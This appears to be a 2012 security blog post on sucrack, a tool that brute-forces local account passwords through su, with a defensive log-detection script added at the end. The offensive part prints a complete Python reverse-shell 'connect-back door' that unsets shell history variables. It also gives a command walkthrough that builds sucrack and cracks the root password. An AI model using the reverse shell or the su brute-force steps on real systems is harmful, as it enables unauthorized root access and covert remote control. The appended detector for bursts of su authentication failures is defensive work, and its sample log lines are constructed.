Local cracking: sucrack
Posted on 2012-8-25 17:51:15
sucrack is a multithreaded Linux/UNIX local password cracking tool that attacks local user accounts through su,
that is:
su root

    root@Dis9Team:~# su brk
    brk@Dis9Team:/root$ su root
    Password:
    root@Dis9Team:~#

As a bonus, here is a connect-back script that supports su operations:

    #!/usr/bin/python
    import sys
    import os
    import socket
    import pty

    shell = "/bin/sh"

    def usage(programname):
        print "Python connect-back door"
        print "Usage: %s <conn_back_ip> <port>" % programname

    def main():
        if len(sys.argv) !=3:
            usage(sys.argv[0])
            sys.exit(1)

        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

        try:
            s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
            print "[+]Connect OK."
        except:
            print "[-]Can't connect"
            sys.exit(2)

        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        global shell
        os.unsetenv("HISTFILE")
        os.unsetenv("HISTFILESIZE")
        pty.spawn(shell)
        s.close()

    if __name__ == "__main__":
        main()

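Switch to a regular user; building does not require root privileges. If you are working in a shell, pay attention to the current user's location. In a shell, it is recommended to have the brk@Dis9Team:~$ ./configure --prefix=/home/brk/su step build into the TMP directory.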

    brk@Dis9Team:~$ wget http://www.leidecker.info/projects/sucrack/sucrack-1.2.3.tar.gz
    brk@Dis9Team:~$ tar xf sucrack-1.2.3.tar.gz
    brk@Dis9Team:~$ cd sucrack-1.2.3/
    brk@Dis9Team:~$ ./configure --prefix=/home/brk/su
    brk@Dis9Team:~$ make
    brk@Dis9Team:~$ make install
    brk@Dis9Team:~$ cd su/bin/
    brk@Dis9Team:~/su/bin$ ./sucrack -h
    sucrack 1.2.3 (LINUX) - the su cracker
    Copyright (C) 2006  Nico Leidecker; nfl@portcullis-security.com

    Usage: ./sucrack [-char] [-w num] [-b size] [-s sec] [-u user] [-l rules] wordlist

    The word list can either be an existing file or stdin. In that case, use '-' instead of a file name

    Options:
       h       : print this message
       a       : ansi escape codes not available.
                 Use the --enable-statistics configure flag.
       s sec   : statistics display interval not available.
                 Use the --enable-statistics configure flag.
       c       : only print statistics if a key other than `q' is pressed. (default)
       r       : enable rewriter
       w num   : number of worker threads running with
       b size  : size of word list buffer
       u user  : user account to su to
       l rules : specify rewriting rules; rules can be:
                   A = all characters upper case
                   F = first character upper case
                   L = last character upper case
                   a = all characters lower case
                   f = first character lower case
                   l = last character lower case
                   D = prepend digit
                   d = append digit
                   e = 1337 characters
                   x = all rules

    Environment Variables:
       SUCRACK_SU_PATH      : The path to su (usually /bin/su or /usr/bin/su)

       SUCRACK_AUTH_FAILURE : The message su returns on an authentication
                              failure (like "su: Authentication failure" or "su: Sorry")
       SUCRACK_AUTH_SUCCESS : The message that indicates an authentication
                              success. This message must not be a password
                              listed in the wordlist (default is "SUCRACK_SUCCESS")

    Example:
       export SUCRACK_AUTH_SUCCESS="sucrack_says_hello"
       ./sucrack -a -w 20 -s 10 -u root -rl AFLafld dict.txt
    brk@Dis9Team:~/su/bin$

-u specifies the user account; -w sets the number of worker threads to run.

Now crack the root password:


    brk@Dis9Team:~/su/bin$ ./sucrack -w 20 -u root /tmp/passwd.txt
    password is: 123456
    brk@Dis9Team:~/su/bin$

Test:

    brk@Dis9Team:~/su/bin$ su root
    Password:
    root@Dis9Team:/home/brk/su/bin#





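Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a fine blade.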
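On the defensive side, a multithreaded run like the `-w 20 -u root` one above shows up as a burst of su authentication failures from one account. This is an added example, not part of the original post or of sucrack. It assumes su authenticates through pam_unix and logs in the traditional syslog format; the log lines, PIDs, the user alice, the year and the thresholds are constructed or assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# pam_unix record written when an su attempt is rejected (format assumed, see lead-in).
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ su(?:\[\d+\])?: "
    r"pam_unix\(su(?:-l)?:auth\): authentication failure;"
    r".*\bruser=(?P<ruser>\S*).*\buser=(?P<user>\S+)"
)

def find_su_bursts(lines, threshold=5, window=timedelta(seconds=10), year=2012):
    """Return {(calling user, target user): peak failures seen inside one window}."""
    recent = defaultdict(deque)   # sliding window of failure timestamps per pair
    peaks = {}
    for line in lines:
        m = FAIL_RE.match(line)
        if not m:
            continue              # successes and unrelated records are ignored
        # Traditional syslog timestamps carry no year, so one is supplied.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ruser"], m["user"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()           # drop failures that fell out of the window
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

# Constructed sample: eight failures by brk against root within two seconds,
# then a single mistyped password by alice followed by her successful su.
SAMPLE = [
    f"Aug 25 17:52:0{i // 4} Dis9Team su[{2300 + i}]: pam_unix(su:auth): "
    "authentication failure; logname=brk uid=1000 euid=0 tty=/dev/pts/1 "
    "ruser=brk rhost=  user=root"
    for i in range(8)
] + [
    "Aug 25 18:30:11 Dis9Team su[2411]: pam_unix(su:auth): authentication failure; "
    "logname=alice uid=1001 euid=0 tty=/dev/pts/2 ruser=alice rhost=  user=root",
    "Aug 25 18:31:40 Dis9Team su[2415]: pam_unix(su:session): session opened "
    "for user root by alice(uid=1001)",
]

if __name__ == "__main__":
    for (ruser, target), count in find_su_bursts(SAMPLE).items():
        print(f"{count} failed su attempts by {ruser} against {target} within 10s")
```

Only the brk-to-root pair is reported; alice's single failure stays below the threshold.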
